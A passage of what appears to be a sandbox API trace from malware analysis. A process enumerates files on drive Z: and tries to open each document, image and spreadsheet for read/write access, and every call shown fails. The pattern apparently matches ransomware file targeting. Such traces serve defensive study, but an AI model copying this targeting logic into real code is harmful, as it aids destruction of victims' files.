Size=0x40) returned 0x2a05a20 [0182.335] PathFindExtensionW (pszPath="Z:\\6614ZQjKlVVwMsRoTm.pdf") returned=".pdf" [0182.340] CreateFileW (lpFileName="Z:\\6614ZQjKlVVwMsRoTm.pdf" (normalized: "z:\\6614zqjklvvwmsrotm.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.342] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.342] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf521, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="d9y1S5e4eLHUosqR.png", cAlternateFileName="")) returned 1 [0182.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.342] PathFindExtensionW (pszPath="Z:\\d9y1S5e4eLHUosqR.png") returned=".png" [0182.348] CreateFileW (lpFileName="Z:\\d9y1S5e4eLHUosqR.png" (normalized: "z:\\d9y1s5e4elhuosqr.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.349] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee3f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sWz45.xls", cAlternateFileName="")) returned 1 [0182.349] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.349] PathFindExtensionW (pszPath="Z:\\sWz45.xls") returned=".xls" [0182.355] CreateFileW (lpFileName="Z:\\sWz45.xls" (normalized: "z:\\swz45.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.356] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.356] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9841, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ydAClD.jpg", cAlternateFileName="")) returned 1 [0182.356] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.356] PathFindExtensionW (pszPath="Z:\\ydAClD.jpg") returned=".jpg" [0182.362] CreateFileW (lpFileName="Z:\\ydAClD.jpg" (normalized: "z:\\ydacld.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.363] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.363] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbccc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NLSuxvhNNdJma1.ods", cAlternateFileName="")) returned 1 [0182.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.363] PathFindExtensionW (pszPath="Z:\\NLSuxvhNNdJma1.ods") returned=".ods" [0182.369] CreateFileW (lpFileName="Z:\\NLSuxvhNNdJma1.ods" (normalized: "z:\\nlsuxvhnndjma1.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.370] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.370] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x646c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="z3wsaUYVG.ppt", cAlternateFileName="")) returned 1 [0182.370] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.370] PathFindExtensionW (pszPath="Z:\\z3wsaUYVG.ppt") returned=".ppt" [0182.376] CreateFileW (lpFileName="Z:\\z3wsaUYVG.ppt" (normalized: "z:\\z3wsauyvg.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.378] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd9ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vwYDXw6oVEHN2plf7.xls", cAlternateFileName="")) returned 1 [0182.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.378] PathFindExtensionW (pszPath="Z:\\vwYDXw6oVEHN2plf7.xls") returned=".xls" [0182.384] CreateFileW (lpFileName="Z:\\vwYDXw6oVEHN2plf7.xls" (normalized: "z:\\vwydxw6ovehn2plf7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.386] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D5VR0w7cu20SVOPPmTeY.pdf", cAlternateFileName="")) returned 1 [0182.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.386] PathFindExtensionW (pszPath="Z:\\D5VR0w7cu20SVOPPmTeY.pdf") returned=".pdf" [0182.391] CreateFileW (lpFileName="Z:\\D5VR0w7cu20SVOPPmTeY.pdf" (normalized: "z:\\d5vr0w7cu20svoppmtey.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.393] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcf0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pEa7gL.ppt", cAlternateFileName="")) returned 1 [0182.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.393] PathFindExtensionW (pszPath="Z:\\pEa7gL.ppt") returned=".ppt" [0182.397] CreateFileW (lpFileName="Z:\\pEa7gL.ppt" (normalized: "z:\\pea7gl.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.398] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5d64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SSGieDhFJl7c1ARWbn5.avi", cAlternateFileName="")) returned 1 [0182.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.398] PathFindExtensionW (pszPath="Z:\\SSGieDhFJl7c1ARWbn5.avi") returned=".avi" [0182.402] CreateFileW (lpFileName="Z:\\SSGieDhFJl7c1ARWbn5.avi" (normalized: "z:\\ssgiedhfjl7c1arwbn5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.404] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1851f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R7Kb10e3K.ppt", cAlternateFileName="")) returned 1 [0182.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.404] PathFindExtensionW (pszPath="Z:\\R7Kb10e3K.ppt") returned=".ppt" [0182.408] CreateFileW (lpFileName="Z:\\R7Kb10e3K.ppt" (normalized: "z:\\r7kb10e3k.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.411] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6142, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wM2fuYVT5vb5rvE.avi", cAlternateFileName="")) returned 1 [0182.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.411] PathFindExtensionW (pszPath="Z:\\wM2fuYVT5vb5rvE.avi") returned=".avi" [0182.415] CreateFileW (lpFileName="Z:\\wM2fuYVT5vb5rvE.avi" (normalized: "z:\\wm2fuyvt5vb5rve.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.417] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x53dd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0O40RGXx.ods", cAlternateFileName="")) returned 1 [0182.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.417] PathFindExtensionW (pszPath="Z:\\0O40RGXx.ods") returned=".ods" [0182.421] CreateFileW (lpFileName="Z:\\0O40RGXx.ods" (normalized: "z:\\0o40rgxx.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.422] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xfcef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RKixholu7QWBM4vIh2Qr.ots", cAlternateFileName="")) returned 1 [0182.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.422] PathFindExtensionW (pszPath="Z:\\RKixholu7QWBM4vIh2Qr.ots") returned=".ots" [0182.426] CreateFileW (lpFileName="Z:\\RKixholu7QWBM4vIh2Qr.ots" (normalized: "z:\\rkixholu7qwbm4vih2qr.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.427] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1446d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z0KtpLCKl6lOwI.csv", cAlternateFileName="")) returned 1 [0182.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.427] PathFindExtensionW (pszPath="Z:\\Z0KtpLCKl6lOwI.csv") returned=".csv" [0182.431] CreateFileW (lpFileName="Z:\\Z0KtpLCKl6lOwI.csv" (normalized: "z:\\z0ktplckl6lowi.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.432] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd1d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b2RYQsRYMuiCI5kbmBC.avi", cAlternateFileName="")) returned 1 [0182.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.433] PathFindExtensionW (pszPath="Z:\\b2RYQsRYMuiCI5kbmBC.avi") returned=".avi" [0182.436] CreateFileW (lpFileName="Z:\\b2RYQsRYMuiCI5kbmBC.avi" (normalized: "z:\\b2ryqsrymuici5kbmbc.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.438] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf76c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OU7w0ZlZCz.png", cAlternateFileName="")) returned 1 [0182.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.438] PathFindExtensionW (pszPath="Z:\\OU7w0ZlZCz.png") returned=".png" [0182.442] CreateFileW (lpFileName="Z:\\OU7w0ZlZCz.png" (normalized: "z:\\ou7w0zlzcz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.443] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1025d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vHFD0HXkcrOt.ppt", cAlternateFileName="")) returned 1 [0182.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.443] PathFindExtensionW (pszPath="Z:\\vHFD0HXkcrOt.ppt") returned=".ppt" [0182.447] CreateFileW (lpFileName="Z:\\vHFD0HXkcrOt.ppt" (normalized: "z:\\vhfd0hxkcrot.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.448] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.448] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x14f11, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U2QSFlSKH2V.jpg", cAlternateFileName="")) returned 1 [0182.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.449] PathFindExtensionW (pszPath="Z:\\U2QSFlSKH2V.jpg") returned=".jpg" [0182.453] CreateFileW (lpFileName="Z:\\U2QSFlSKH2V.jpg" (normalized: "z:\\u2qsflskh2v.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.454] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.454] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x74a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NW3xaHb7.gif", cAlternateFileName="")) returned 1 [0182.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.454] PathFindExtensionW (pszPath="Z:\\NW3xaHb7.gif") returned=".gif" [0182.458] CreateFileW (lpFileName="Z:\\NW3xaHb7.gif" (normalized: "z:\\nw3xahb7.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.459] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x82b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ybbGvlCczfIkCAzvoOo.ods", cAlternateFileName="")) returned 1 [0182.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.459] PathFindExtensionW (pszPath="Z:\\ybbGvlCczfIkCAzvoOo.ods") returned=".ods" [0182.463] CreateFileW (lpFileName="Z:\\ybbGvlCczfIkCAzvoOo.ods" (normalized: "z:\\ybbgvlcczfikcazvooo.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.464] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AEuRQDrOl9iFUCUZ.gif", cAlternateFileName="")) returned 1 [0182.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.464] PathFindExtensionW (pszPath="Z:\\AEuRQDrOl9iFUCUZ.gif") returned=".gif" [0182.468] CreateFileW (lpFileName="Z:\\AEuRQDrOl9iFUCUZ.gif" (normalized: "z:\\aeurqdrol9ifucuz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.469] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xebaa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oHbaMQLYen9icdKg.docx", cAlternateFileName="")) returned 1 [0182.469] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.469] PathFindExtensionW (pszPath="Z:\\oHbaMQLYen9icdKg.docx") returned=".docx" [0182.472] CreateFileW (lpFileName="Z:\\oHbaMQLYen9icdKg.docx" (normalized: 